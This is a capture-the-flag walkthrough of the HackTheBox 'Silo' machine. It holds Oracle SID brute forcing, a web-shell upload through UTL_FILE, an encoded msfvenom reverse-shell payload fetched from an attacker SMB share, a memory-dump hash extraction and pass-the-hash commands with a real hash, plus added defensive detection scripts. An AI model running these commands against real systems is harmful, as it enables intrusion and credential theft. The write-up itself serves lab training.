HackTheBox | Silo

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 21 15:00:32 2022 as: nmap -T5 -p80,135,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 -A -oA scan-all -Pn
Nmap scan report for
Host is up (0.014s latency).

80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-08-21T19:02:35
|_  start_date: 2022-08-21T18:59:31

TRACEROUTE (using port 445/tcp)
1   12.52 ms
2   12.99 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 15:02:41 2022 -- 1 IP address (1 host up) scanned in 129.39 seconds

Service Enumeration

Test SMB for anonymous share enumeration.

smbclient -L //$target -U '' --option="client min protocol=core"

NT_STATUS_LOGON_FAILURE: anonymous access is refused, so we're going to need a credential to connect to SMB.


Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r

/aspnet_client        (Status: 403) [Size: 1233]


nmap already ran the oracle-tns-version script on the port and fingerprinted it as Oracle TNS Listener. I'm not very familiar with this service, but HackTricks has a brief overview of testing it:

1521,1522-1529 - Pentesting Oracle TNS Listener - HackTricks

Looking over the cheat sheet, the methodology for testing Oracle TNS Listener is:

  1. Get the version number
  2. Enumerate SIDs
  3. Test credentials
  4. Exploit
    • Remote Code Execution (RCE)
    • Get/Put files (possible RCE by putting a payload in the web root)
    • Possible privilege escalation on certain versions

Enumerate SIDs

Download the sids-oracle.txt file provided in the HackTricks cheat sheet. Then, let's use the suggested hydra command – with some modifications added by me – to brute force the SIDs.

hydra -V -L ./sids-oracle.txt -o found-sids.txt -s 1521 oracle-sid
cat ./found-sids.txt

[1521][oracle-sid] host:
[1521][oracle-sid] host:   login: CLRExtProc
[1521][oracle-sid] host:   login: PLSExtProc
[1521][oracle-sid] host:   login: XE
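The SID brute force above is noisy on the database side: hydra's oracle-sid module opens one TNS connection per candidate name, and the listener records every attempt in its listener.log, logging a rejected SID with return code 12505 (and a rejected service name with 12514). The script below is an added example, not part of the original write-up, that detects this pattern from the listener's point of view: one client whose rejected connection attempts name many distinct SIDs in a short window. The sample log lines are constructed, and the record layout assumed is the standard listener.log "establish" line.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A listener.log connection record is one line with fields separated by " * ":
#   <timestamp> * <CONNECT_DATA> * <ADDRESS> * establish * <SID or service> * <return code>
# Return code 0 is success; 12505 (unknown SID) and 12514 (unknown service name) mean the
# listener refused the name the client asked for. The client's real address is the HOST=
# inside the ADDRESS= descriptor; the HOST= inside CONNECT_DATA is whatever the client claims.
ESTABLISH_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* .*?"
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\).*?"
    r" \* establish \* (?P<name>\S+) \* (?P<rc>\d+)$"
)
REJECT_CODES = {12505, 12514}

# Constructed sample log: an application server that connects normally (and once mistypes
# the SID), and a client that tries six SIDs in six seconds before landing on XE.
SAMPLE_LOG = """\
21-AUG-2022 19:00:10 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=51000)) * establish * XE * 0
21-AUG-2022 19:00:41 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.20)(PORT=51002)) * establish * XEE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-AUG-2022 19:01:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43210)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-AUG-2022 19:01:03 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43211)) * establish * PROD * 12505
21-AUG-2022 19:01:04 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43212)) * establish * TEST * 12505
21-AUG-2022 19:01:05 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43213)) * establish * DEV * 12505
21-AUG-2022 19:01:06 * (CONNECT_DATA=(SID=SALES)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43214)) * establish * SALES * 12505
21-AUG-2022 19:01:07 * (CONNECT_DATA=(SID=HR)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43215)) * establish * HR * 12505
21-AUG-2022 19:01:08 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=hydra)(HOST=kali)(USER=ben))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.5)(PORT=43216)) * establish * XE * 0
"""


def parse_connections(lines):
    """Yield (timestamp, client_host, requested_name, return_code) for each establish record."""
    for line in lines:
        m = ESTABLISH_RE.match(line)
        if not m:
            continue  # TNS-xxxxx continuation lines, service registrations, etc.
        yield (datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
               m["host"], m["name"].upper(), int(m["rc"]))


def find_sid_guessing(lines, window=timedelta(seconds=60), threshold=5):
    """Return {client_host: set_of_rejected_names} for clients whose rejected attempts name
    at least `threshold` distinct SIDs/services inside some `window`-long period.
    A single typo never trips it; a wordlist does."""
    rejected = defaultdict(list)
    for ts, host, name, rc in parse_connections(lines):
        if rc in REJECT_CODES:
            rejected[host].append((ts, name))
    flagged = {}
    for host, attempts in rejected.items():
        attempts.sort()
        start = 0
        for end, (ts, _) in enumerate(attempts):
            while ts - attempts[start][0] > window:  # slide the window forward
                start += 1
            names = {n for _, n in attempts[start:end + 1]}
            if len(names) >= threshold:
                flagged.setdefault(host, set()).update(names)
    return flagged


if __name__ == "__main__":
    for host, names in find_sid_guessing(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {len(names)} distinct rejected SIDs in one window -> {sorted(names)}")
```

The threshold and window are the tuning knobs: a misconfigured application retrying one wrong SID produces many rejections but only one distinct name, so counting distinct names rather than raw failures keeps that case quiet.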

Test Credentials

I tested the offline cracking methodology described here in the cheat sheet. I found that the XE SID is the only SID that would return user hashes. Unfortunately, I don't have a super strong GPU to brute-force hashes and the word list I used was not returning anything valid.

I am going to use the odat tool mentioned in the cheat sheet. A couple of dependencies were not installed, so I'm noting here what I installed:

python3 -m pip install python-libnmap
python3 -m pip install pycryptodome

Now, we can get to work.

./odat.py --help
./odat.py passwordguesser --help
./odat.py passwordguesser -s -p 1521 -d XE --both-ul

Time to Exploit

We've completed all three prerequisites to exploit the target as discussed above:

  1. Get the version number
  2. Enumerate SIDs
    • Valid SID: XE
  3. Test credentials
    • Valid Credentials: scott/tiger

First, let's install the sqlplus client so we can connect to the database and double-check the credential.

sudo apt update
sudo apt install -y oracle-instantclient-sqlplus

# Set an environment variable so the sqlplus client
# can load the shared libraries
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib

# Add the environment variable to .zshrc so that
# it's set every time a shell opens
echo 'export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib' >> ~/.zshrc

Now, let's try connecting to the database.

sqlplus scott/tiger@ 'as sysdba';


Test Web Root Upload

Let's see if we can abuse the IIS web server to upload a shell and gain a foothold. First, let's see if we can upload a test.html file to the web root.

echo '<h1>Hello, world! From 0xBEN</h1>' > test.html

Now, we'll connect to the database as the administrator using the --sysdba flag and write the test.html file to the web root, C:\inetpub\wwwroot.

./odat.py utlfile --help
./odat.py utlfile -s -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' test.html test.html --sysdba

Upload Web Pseudo-shell

I am going to use this code as a template for my pseudo-shell. All credit goes to the author.

Simple ASPX application (vulnerable to OS command injections) - ping.aspx

Download the code:

wget https://gist.githubusercontent.com/stasinopoulos/95ce3d164fec1d477f80ea3675be2021/raw/b2fdbda6798f015a452df37f792bbc2b99c97b06/ping.aspx -O cmd.aspx

Now, I'm going to change this line of code:

psi.Arguments = "/c ping -n 2 " + arg;

to the following, so that whatever is passed in the argument is run as the command:

psi.Arguments = "/c " + arg;

Now, let's upload the file to the web root.

./odat.py utlfile -s -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' cmd.aspx cmd.aspx --sysdba
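Both writes above (test.html and cmd.aspx) reach C:\inetpub\wwwroot through the database's UTL_FILE package, never through IIS, so no upload control on the web server sees them. The cheapest detective control for that is a content baseline of the web root: hash every file, store the result, and diff periodically, treating any new or changed server-side script as an alert. The following is an added example, not code from the write-up or from odat; it builds a throwaway stand-in for the web root in a temporary directory (the real path is only named in a comment), baselines it, simulates the out-of-band writes and reports the diff.

```python
import hashlib
import tempfile
from pathlib import Path

# File types whose appearance or change in a web root deserves an immediate look.
# Static content changes routinely; executable server-side content should not.
SCRIPT_SUFFIXES = {".aspx", ".asp", ".ashx", ".asmx", ".config", ".dll", ".exe", ".ps1"}


def snapshot(root):
    """Map each file under `root` (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_snapshots(baseline, current):
    """Return {'added': [...], 'modified': [...], 'removed': [...]} between two snapshots."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def suspicious_changes(changes):
    """Added or modified files whose extension means server-side code or configuration."""
    return sorted(p for p in changes["added"] + changes["modified"]
                  if Path(p).suffix.lower() in SCRIPT_SUFFIXES)


def demo():
    """Build a stand-in for C:\\inetpub\\wwwroot in a temp dir, baseline it, then simulate
    the kind of writes the text describes and return (all changes, the ones worth alerting on)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed baseline content.
        (root / "index.html").write_text("<h1>IIS Windows Server</h1>")
        (root / "web.config").write_text("<configuration/>")
        (root / "aspnet_client").mkdir()
        (root / "aspnet_client" / "readme.txt").write_text("static")
        baseline = snapshot(root)

        # Out-of-band writes: a script dropped in, a static page edited, config changed.
        (root / "cmd.aspx").write_text("<!-- placeholder for a dropped script -->")
        (root / "index.html").write_text("<h1>IIS Windows Server</h1>\n<!-- edited -->")
        (root / "web.config").write_text("<configuration><!-- changed --></configuration>")

        changes = diff_snapshots(baseline, snapshot(root))
        return changes, suspicious_changes(changes)


if __name__ == "__main__":
    changes, alerts = demo()
    print("changes:", changes)
    print("alert on:", alerts)
```

In production the baseline would be written to a file outside the web root (or to a central store) right after each legitimate deployment, and the diff scheduled; a file that the database service account, rather than the deployment pipeline, created is exactly what this catches.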

Transfer a Reverse Shell

I used my pseudo-shell to run systeminfo and find out more about the target operating system. Next, let's create a reverse shell payload with msfvenom and use the pseudo-shell to transfer it to the target.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST= LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe

Now, we'll start an SMB server to host the file and a listener to catch the shell, then execute the payload on the target.

# Start an SMB server
smbserver.py -smb2support evil $PWD

# Start a TCP listener
sudo rlwrap nc -lnvp 443

Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 SILO
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00115-23036-AA976
Original Install Date:     12/31/2017, 11:01:23 PM
System Boot Time:          8/28/2022, 1:33:39 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,086 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,491 MB
Virtual Memory: In Use:    1,308 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 149 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894852
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2934520
                           [11]: KB2938066
                           [12]: KB2954879
                           [13]: KB2966826
                           [14]: KB2966828
                           [15]: KB2967917
                           [16]: KB2968296
                           [17]: KB2972103
                           [18]: KB2973114
                           [19]: KB2973351
                           [20]: KB2989930
                           [21]: KB3000850
                           [22]: KB3003057
                           [23]: KB3004361
                           [24]: KB3004365
                           [25]: KB3012702
                           [26]: KB3013172
                           [27]: KB3013791
                           [28]: KB3014442
                           [29]: KB3019978
                           [30]: KB3021910
                           [31]: KB3022777
                           [32]: KB3023219
                           [33]: KB3023266
                           [34]: KB3024751
                           [35]: KB3024755
                           [36]: KB3029603
                           [37]: KB3030377
                           [38]: KB3030947
                           [39]: KB3033446
                           [40]: KB3035126
                           [41]: KB3036612
                           [42]: KB3037576
                           [43]: KB3037924
                           [44]: KB3038002
                           [45]: KB3042085
                           [46]: KB3043812
                           [47]: KB3044374
                           [48]: KB3044673
                           [49]: KB3045634
                           [50]: KB3045685
                           [51]: KB3045717
                           [52]: KB3045719
                           [53]: KB3045755
                           [54]: KB3045992
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3048043
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB3054464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3055642
                           [66]: KB3059317
                           [67]: KB3060681
                           [68]: KB3060793
                           [69]: KB3061512
                           [70]: KB3063843
                           [71]: KB3071756
                           [72]: KB3072307
                           [73]: KB3074228
                           [74]: KB3074545
                           [75]: KB3075220
                           [76]: KB3077715
                           [77]: KB3078405
                           [78]: KB3078676
                           [79]: KB3080042
                           [80]: KB3080149
                           [81]: KB3082089
                           [82]: KB3084135
                           [83]: KB3086255
                           [84]: KB3087041
                           [85]: KB3087137
                           [86]: KB3091297
                           [87]: KB3092601
                           [88]: KB3092627
                           [89]: KB3094486
                           [90]: KB3095701
                           [91]: KB3097992
                           [92]: KB3099834
                           [93]: KB3100473
                           [94]: KB3103616
                           [95]: KB3103696
                           [96]: KB3103709
                           [97]: KB3109103
                           [98]: KB3109976
                           [99]: KB3110329
                           [100]: KB3115224
                           [101]: KB3121261
                           [102]: KB3121461
                           [103]: KB3122651
                           [104]: KB3123245
                           [105]: KB3126033
                           [106]: KB3126434
                           [107]: KB3126587
                           [108]: KB3127222
                           [109]: KB3128650
                           [110]: KB3133043
                           [111]: KB3133690
                           [112]: KB3134179
                           [113]: KB3134815
                           [114]: KB3137728
                           [115]: KB3138602
                           [116]: KB3139164
                           [117]: KB3139398
                           [118]: KB3139914
                           [119]: KB3140219
                           [120]: KB3140234
                           [121]: KB3145384
                           [122]: KB3145432
                           [123]: KB3146604
                           [124]: KB3146723
                           [125]: KB3146751
                           [126]: KB3147071
                           [127]: KB3153704
                           [128]: KB3155784
                           [129]: KB3156059
                           [130]: KB3159398
                           [131]: KB3161949
                           [132]: KB3161958
                           [133]: KB3162343
                           [134]: KB3169704
                           [135]: KB3172614
                           [136]: KB3172729
                           [137]: KB3173424
                           [138]: KB3175024
                           [139]: KB3178539
                           [140]: KB3179574
                           [141]: KB3186539
                           [142]: KB4033369
                           [143]: KB4033428
                           [144]: KB4040972
                           [145]: KB4040974
                           [146]: KB4040981
                           [147]: KB4041777
                           [148]: KB4054854
                           [149]: KB4054519
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Current User

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Users and Groups

Local Users

User accounts for \\

Administrator            Guest                    Phineas

Local Groups

SILO\Access Control Assistance Operators
SILO\Backup Operators
SILO\Certificate Service DCOM Access
SILO\Cryptographic Operators
SILO\Distributed COM Users
SILO\Event Log Readers
SILO\Hyper-V Administrators
SILO\Network Configuration Operators
SILO\Performance Log Users
SILO\Performance Monitor Users
SILO\Power Users
SILO\Print Operators
SILO\RDS Endpoint Servers
SILO\RDS Management Servers
SILO\RDS Remote Access Servers
SILO\Remote Desktop Users
SILO\Remote Management Users

Network Configurations


Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . :
   Subnet Mask . . . . . . . . . . . :
   Default Gateway . . . . . . . . . :

Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Open Ports

TCP                 LISTENING       4
  TCP                LISTENING       620
  TCP                LISTENING       4
  TCP               LISTENING       1212
  TCP               LISTENING       4
  TCP              LISTENING       4
  TCP              LISTENING       428
  TCP              LISTENING       760
  TCP              LISTENING       828
  TCP              LISTENING       904
  TCP              LISTENING       1076
  TCP              LISTENING       528
  TCP              LISTENING       520
  TCP              LISTENING       1804
  TCP              LISTENING       4
  TCP              LISTENING       1212
  TCP              LISTENING       1212
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       620
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1521              [::]:0                 LISTENING       1212
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       428
  TCP    [::]:49153             [::]:0                 LISTENING       760
  TCP    [::]:49154             [::]:0                 LISTENING       828
  TCP    [::]:49155             [::]:0                 LISTENING       904
  TCP    [::]:49159             [::]:0                 LISTENING       1076
  TCP    [::]:49160             [::]:0                 LISTENING       528
  TCP    [::]:49161             [::]:0                 LISTENING       520
  TCP    [::]:49162             [::]:0                 LISTENING       1804

Interesting Files

C:\Users\Phineas\Desktop\Oracle issue.txt

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 

link password:

NOTE: The password for the Dropbox file would not work for me, so I had to glance at a walkthrough for answers. Turns out there was an encoding issue causing the £ character to display as ?. The actual password is £%Hm8646uC$

Open the Dropbox link in your browser and enter the supplied password.

Privilege Escalation

We're provided with a SILO-20180105-221806.zip file from Dropbox. If you unzip it, you'll find a memory dump file .DMP that we need to analyze.

Reading the Crash Dump

Download Volatility

Download the Linux standalone executable and unzip the archive.

Release Downloads | Volatility Foundation
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cp volatility_2.6_lin64_standalone/volatility_2.6_lin64_standalone ./volatility

Analyze the Dump File

Using the systeminfo command output from before, we know we're dealing with a Microsoft Windows Server 2012 R2 Standard x64 operating system. This is critical to know, as it will enable Volatility to read the memory artifacts correctly.

# Show help message
./volatility --help

# List profiles (and other info)
./volatility --info
./volatility --info | grep 2012

# This command will take a bit to run
# Dump NTLM hashes from memory
./volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
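The hashdump plugin prints one line per local account in pwdump format, user:rid:LM hash:NT hash:::, which is also what the pass-the-hash tools below consume. Two constants are worth recognising on sight: aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string and means no LM hash is stored for the account (the default since Vista/Server 2008), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, meaning the account has a blank password. The script below is an added example, not part of the write-up or of Volatility, that parses such output and reports the findings a defender cares about in a dump like this one: LM hashes still being stored, blank passwords, and local accounts sharing a password. The Administrator line carries the hash shown on this page; every other line is constructed.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (blank password)

# pwdump format: <user>:<rid>:<LM hash>:<NT hash>:::
HASH_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: the Administrator hash is the one from this page, the banner line is
# what the plugin prints first, and the remaining accounts (and their hashes) are invented.
SAMPLE_HASHDUMP = """\
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_oracle:1001:c2265b23734e0dacaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""


def parse_hashdump(text):
    """Return [(user, rid, lm, nt), ...]; banner and other non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = HASH_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return rows


def triage(text):
    """Map each account to a list of findings (empty list = nothing notable)."""
    rows = parse_hashdump(text)

    # Accounts with identical NT hashes have identical passwords (NT hashes are unsalted).
    users_by_nt = defaultdict(list)
    for user, _, _, nt in rows:
        users_by_nt[nt].append(user)

    findings = {}
    for user, rid, lm, nt in rows:
        flags = []
        if lm != EMPTY_LM:
            flags.append("lm_hash_stored")       # LM storage enabled: weak, crackable hash
        if nt == EMPTY_NT:
            flags.append("blank_password")
        elif len(users_by_nt[nt]) > 1:
            others = ",".join(u for u in users_by_nt[nt] if u != user)
            flags.append("password_shared_with:" + others)
        findings[user] = flags
    return findings


if __name__ == "__main__":
    for user, flags in triage(SAMPLE_HASHDUMP).items():
        print(f"{user:<14} {', '.join(flags) or 'ok'}")
```

Because the NT hash is unsalted, the shared-password check needs no cracking at all: equal hashes are equal passwords, which is also why a single recovered hash is enough for the pass-the-hash step that follows.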

Pass the Hash

We'll practice this with a few options:

# pth-winexe
pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' // cmd.exe

# smbexec.py
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@'

# psexec.py
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@' cmd.exe

# CrackMapExec
# Create a payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST= LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe
# Host it with SMB server
smbserver.py -smb2support evil $PWD
# Start a listener
sudo rlwrap nc -lnvp 443
# Connect to SMB as the Administrator and run the payload from the SMB server on Kali
crackmapexec smb -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' --local-auth -x '\\\evil\0xBEN_shell.exe'